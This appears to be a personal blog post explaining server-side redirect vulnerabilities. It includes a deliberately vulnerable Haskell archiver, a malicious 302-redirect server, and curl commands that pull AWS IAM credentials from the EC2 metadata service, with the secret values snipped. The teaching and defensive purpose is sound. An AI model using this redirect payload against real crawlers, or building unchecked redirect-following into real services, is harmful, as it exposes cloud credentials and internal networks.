Redirect vulnerabilities

Published: 2017-08-09
Words: 1513

In keeping with this blog's aim (writing about things I didn't know about 1-5 years ago), today we discuss redirect vulnerabilities. I wish I had known about these back when I was writing IRC bots and other foolish scripts.

As per usual on topics like this, you're better off reading OWASP. However, half the battle is just knowing that this is something you need to think about.

Summary

When making HTTP requests against untrusted hosts, think twice before following redirects. Blindly following redirects may lead to information disclosure or privilege escalation.

Figure out a threat model, decide on a policy to handle redirects, and stick to it. At the very least, you probably want to disallow redirects into your private network.

GET outta here

Think carefully about all the information your server can access via HTTP.

If it's sitting in your basement, it can probably access a terrible consumer-grade router. That router probably uses BASIC authentication over HTTP to perform privileged operations, but it might also have status pages available sans authentication. Other machines on your local network might also be running a HTTP server, maybe for music playback or some terrible IoT toaster.

If it's sitting in a rack in a data center, it's probably part of some virtual network, with access to all your other internal REST services. In a perfect world, these would all require authorisation headers. In practice, they might not require any authentication at all.

If it's running on AWS EC2, depending on its configured role, it can access all your production S3 buckets, talk to IAM, and perform other privileged AWS actions. Fortunately, most AWS HTTP actions require request-signing. It can also access any local REST services exposed in the virtual network, with the same caveats above. Worse, it can access the EC2 instance metadata store, which requires no authentication at all.

When we make a HTTP request to a server that initiates a redirect, that server hands us an arbitrary address. The HTTP client must decide whether to send the same request to that arbitrary address.

In other words, blindly following all redirects could lead to the compromise of all the private HTTP services described above. This could expose sensitive user information, network topology, or credentials to your infrastructure.

While the severity depends on the nature of the application, it also depends on the security of the services running in your private network. This is hard to guarantee. It is much easier to just apply heavy scrutiny to potential redirects.

Full compromise

To make things a little more real, I've constructed an especially vulnerable application, and paired it up with a little WAI application that leads it to expose the server's AWS credentials when running on Amazon Lightsail.

Redirects need to be validated at all times, even when performing limited GET requests against a known service, like fetching from NPM. However, services like web crawlers or archivers that send requests to untrusted user-provided URIs are particularly exposed: an attacker simply stands up their own server somewhere, and your server starts hitting any URI they choose.

My toy service is a web archiver. It accepts a URI as a POST parameter, fetches the contents via wreq, and then serves the result from memory under a new unique URI. All code is available here. The code is intentionally poor and should not be used in any circumstances.

The EC2 instance metadata store

When running on EC2, you have an additional REST service to worry about. The instance metadata store is a key-value store used to send data from internal AWS systems to your EC2 instance.

If you haven't heard about it, I suggest reading Colin Percival's blog post EC2s most dangerous feature, or just curling around http://169.254.169.254 from an EC2 instance.

Here's what it looks like when you poke around in the meta-data subtree:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

In addition to things like the instance ID and AMI ID, there's iam. This is the way IAM manages AWS credentials! They're available via this HTTP service from user mode, no authentication required.

We can list the IAM roles by curling meta-data/iam/, and then we can simply dump out the keys. I'm targeting Lightsail today, since it always has the same role name and probably doesn't have a lot of permissions:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
AmazonLightsailInstanceRole

... and if we curl that, we get everything we need to authenticate with AWS:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AmazonLightsailInstanceRole
{
  "Code" : "Success",
  "LastUpdated" : "2017-08-09T09:17:26Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "<snip>",
  "SecretAccessKey" : "<snip>",
  "Token" : "<snip>",
  "Expiration" : "2017-08-09T15:51:00Z"
}

If this were running on your actual infrastructure rather than Lightsail and the attacker didn't know your IAM setup, it would take two attempts instead of one to get these credentials.

A very bad service

Our archival service is a pretty simple WAI application. When someone POSTs to /site, it grabs a URI out of the POST payload, follows it with wreq, and stores the result under a unique ID. When someone gets /site/{id}, we serve the text back up.

I'll leave out most of the details. Head to the gist to see the full code, this won't compile on its own.

Here's the interface for the storage backend:

data Storage = Storage {
    insert :: Text -> IO Id
  , lookup :: Id -> IO (Maybe Text)
  }

... and we can mock it up using IORefs trapped in closures:

simpleStorage :: IO Storage
simpleStorage = do
  ref <- IORef.newIORef M.empty
  next <- IORef.newIORef (0 :: Integer)
  let
    fresh = do
      fmap (Id . T.pack . show) . IORef.atomicModifyIORef' next $ \j -> (j+1, j)

    ins t = do
      idd <- fresh
      IORef.atomicModifyIORef' ref $ \m ->
        (M.insert idd t m, idd)

    lkp i =
      fmap (M.lookup i) (IORef.readIORef ref)
  pure (Storage ins lkp)

Our WAI application is pretty straightforward, doing exactly what I described above:

application :: Storage -> Wai.Application
application storage request respond =
  case (Wai.requestMethod request, Wai.pathInfo request) of
    (POST, ["site"]) ->
      sitePost storage request >>= respond
    (GET, ["site", uri]) ->
      siteGet storage uri >>= respond
    _ ->
      respond (plain HTTP.status404 [] "Not Found")

... and I'll leave out the resources. We perform a little bit of weak validation on the URI before making any requests. Specifically, we check it's not a bare IP address:

-- | Make a token effort to avoid pinging our local network.
safeUri :: URI -> Maybe URI
safeUri uri = do
  ua <- URI.uriAuthority uri
  let rn = URI.uriRegName ua
  guard (not (URI.isIPv4address rn))
  guard (not (URI.isIPv6address rn))
  pure uri

The vulnerability itself is in the way we fetch data from untrusted URIs. Using wreq with defaults, all redirects are followed without question. The same is true for http-client, the main alternative to wreq:

-- | Fetch a URI and return the response body.
getText :: URI -> IO (Maybe Text)
getText uri = do
  response <- Wreq.getWith opts uris
  case HTTP.statusCode (response ^. Wreq.responseStatus) of
    200 ->
      case TE.decodeUtf8' (BSL.toStrict (response ^. Wreq.responseBody)) of
        Right txt ->
          pure (Just txt)
        Left _ ->
          pure Nothing
    _ ->
      pure Nothing
  where
    uris = uriToString id uri []
    opts = Wreq.defaults & Wreq.header "Accept" .~ ["text/plain"]

When we stand up the server, we can observe it kinda works (although I haven't bothered handling MIME types properly, nor have we handled wreq's exceptions):

$ curl -X POST -d 'site=http%3A%2F%2Fwww.gutenberg.org%2Ffiles%2F11%2F11-0.txt' localhost:8000/site
Created
$ curl localhost:8000/site/0 2>/dev/null | head
Project Gutenberg’s Alice’s Adventures in Wonderland, by Lewis Carroll

This eBook is for the use of anyone anywhere at no cost and with
almost no restrictions whatsoever.  You may copy it, give it away or
re-use it under the terms of the Project Gutenberg License included
with this eBook or online at www.gutenberg.org


Title: Alice’s Adventures in Wonderland

A very bad server

It's really, truly straightforward to redirect a request to a constant address! Here's all we need to send the boss straight into the EC2 instance store:

application :: Wai.Application
application _request respond =
  respond $
    Wai.responseLBS HTTP.status302 [(HTTP.hLocation, location)] mempty

location :: ByteString
location =
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/AmazonLightsailInstanceRole"

Running this pair on my Lightsail box, we can pretty easily trick the crawler into serving AWS credentials for all to see:

$ curl -X POST -d 'http%3A%2F%2Flocalhost%3A8080' localhost:8000/site
Created
$ curl localhost:8000/site/1
{
  "Code" : "Success",
  "LastUpdated" : "2017-08-09T09:17:26Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "<snip>",
  "SecretAccessKey" : "<snip>",
  "Token" : "<snip>",
  "Expiration" : "2017-08-09T15:51:00Z"
}

Though we were "certain" that the initial URI was safe, we didn't validate the subsequent redirected URIs at all, and now everything's ruined. Be careful out there.

Mitigation

Here are a few possible strategies to mitigate redirects:

Working with either wreq or http-client, it's pretty straightforward to implement such strategies. Don't follow redirects, check for a 302 response code, and apply scrutiny.